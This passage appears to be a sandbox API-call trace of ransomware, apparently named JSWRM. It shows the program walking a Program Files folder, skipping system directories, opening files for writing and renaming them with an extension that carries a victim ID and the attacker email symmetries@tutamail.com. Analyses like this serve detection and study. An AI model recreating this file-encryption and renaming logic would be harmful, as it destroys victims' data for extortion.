(lpString1="baseAltGr_rtl.xml", lpString2=".") returned 1 [0068.083] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="..") returned 1 [0068.083] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="...") returned 1 [0068.083] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="windows") returned -1 [0068.083] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="recovery") returned -1 [0068.083] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="perflogs") returned -1 [0068.083] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="documents and settings") returned -1 [0068.083] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.083] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="system volume information") returned -1 [0068.083] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="msocache") returned -1 [0068.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="baseAltGr_rtl.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="baseAltGr_rtl.xml", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="baseAltGr_rtl.xml", lpUsedDefaultChar=0x0) returned 17 [0068.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="baseAltGr_rtl.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="baseAltGr_rtl.xml", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="baseAltGr_rtl.xml", lpUsedDefaultChar=0x0) returned 17 [0068.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0068.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0068.084] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.086] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9964392848515280) returned 0 [0068.086] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.086] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.086] CloseHandle (hObject=0xffffffff) returned 1 [0068.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0068.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0068.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0068.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1f1c60 [0068.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0068.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f1c60 | out: hHeap=0x1e0000) returned 1 [0068.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.086] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0068.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0068.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0068.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.087] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_altgr.xml", cAlternateFileName="")) returned 1 [0068.087] lstrcmpiW (lpString1="base_altgr.xml", lpString2=".") returned 1 [0068.087] lstrcmpiW (lpString1="base_altgr.xml", lpString2="..") returned 1 [0068.087] lstrcmpiW (lpString1="base_altgr.xml", lpString2="...") returned 1 [0068.087] lstrcmpiW (lpString1="base_altgr.xml", lpString2="windows") returned -1 [0068.087] lstrcmpiW (lpString1="base_altgr.xml", lpString2="recovery") returned -1 [0068.087] lstrcmpiW (lpString1="base_altgr.xml", lpString2="perflogs") returned -1 [0068.087] lstrcmpiW (lpString1="base_altgr.xml", lpString2="documents and settings") returned -1 [0068.087] lstrcmpiW (lpString1="base_altgr.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.087] lstrcmpiW (lpString1="base_altgr.xml", lpString2="system volume information") returned -1 [0068.087] lstrcmpiW (lpString1="base_altgr.xml", lpString2="msocache") returned -1 [0068.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_altgr.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_altgr.xml", cchWideChar=14, lpMultiByteStr=0x345e870, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_altgr.xml", lpUsedDefaultChar=0x0) returned 14 [0068.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_altgr.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_altgr.xml", cchWideChar=14, lpMultiByteStr=0x345e840, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_altgr.xml", lpUsedDefaultChar=0x0) returned 14 [0068.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0068.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0068.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0068.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.087] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9962022026570096) returned 0 [0068.088] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.088] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.088] CloseHandle (hObject=0xffffffff) returned 1 [0068.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0068.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0068.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0068.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1f1c60 [0068.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0068.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f1c60 | out: hHeap=0x1e0000) returned 1 [0068.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.088] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0068.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0068.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0068.088] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdc9, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_ca.xml", cAlternateFileName="")) returned 1 [0068.088] lstrcmpiW (lpString1="base_ca.xml", lpString2=".") returned 1 [0068.088] lstrcmpiW (lpString1="base_ca.xml", lpString2="..") returned 1 [0068.088] lstrcmpiW (lpString1="base_ca.xml", lpString2="...") returned 1 [0068.088] lstrcmpiW (lpString1="base_ca.xml", lpString2="windows") returned -1 [0068.088] lstrcmpiW (lpString1="base_ca.xml", lpString2="recovery") returned -1 [0068.088] lstrcmpiW (lpString1="base_ca.xml", lpString2="perflogs") returned -1 [0068.088] lstrcmpiW (lpString1="base_ca.xml", lpString2="documents and settings") returned -1 [0068.089] lstrcmpiW (lpString1="base_ca.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.089] lstrcmpiW (lpString1="base_ca.xml", lpString2="system volume information") returned -1 [0068.089] lstrcmpiW (lpString1="base_ca.xml", lpString2="msocache") returned -1 [0068.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_ca.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_ca.xml", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_ca.xml", lpUsedDefaultChar=0x0) returned 11 [0068.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_ca.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_ca.xml", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_ca.xml", lpUsedDefaultChar=0x0) returned 11 [0068.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0068.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0068.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0068.089] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.089] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9954909560727736) returned 0 [0068.089] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.089] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.089] CloseHandle (hObject=0xffffffff) returned 1 [0068.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0068.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0068.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0068.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0068.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0068.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0068.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.090] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0068.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0068.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0068.090] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="base_heb.xml", cAlternateFileName="")) returned 1 [0068.090] lstrcmpiW (lpString1="base_heb.xml", lpString2=".") returned 1 [0068.090] lstrcmpiW (lpString1="base_heb.xml", lpString2="..") returned 1 [0068.090] lstrcmpiW (lpString1="base_heb.xml", lpString2="...") returned 1 [0068.090] lstrcmpiW (lpString1="base_heb.xml", lpString2="windows") returned -1 [0068.090] lstrcmpiW (lpString1="base_heb.xml", lpString2="recovery") returned -1 [0068.090] lstrcmpiW (lpString1="base_heb.xml", lpString2="perflogs") returned -1 [0068.090] lstrcmpiW (lpString1="base_heb.xml", lpString2="documents and settings") returned -1 [0068.090] lstrcmpiW (lpString1="base_heb.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.090] lstrcmpiW (lpString1="base_heb.xml", lpString2="system volume information") returned -1 [0068.090] lstrcmpiW (lpString1="base_heb.xml", lpString2="msocache") returned -1 [0068.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_heb.xml", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_heb.xml", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_heb.xml", lpUsedDefaultChar=0x0) returned 12 [0068.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_heb.xml", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="base_heb.xml", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_heb.xml", lpUsedDefaultChar=0x0) returned 12 [0068.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0068.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0068.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 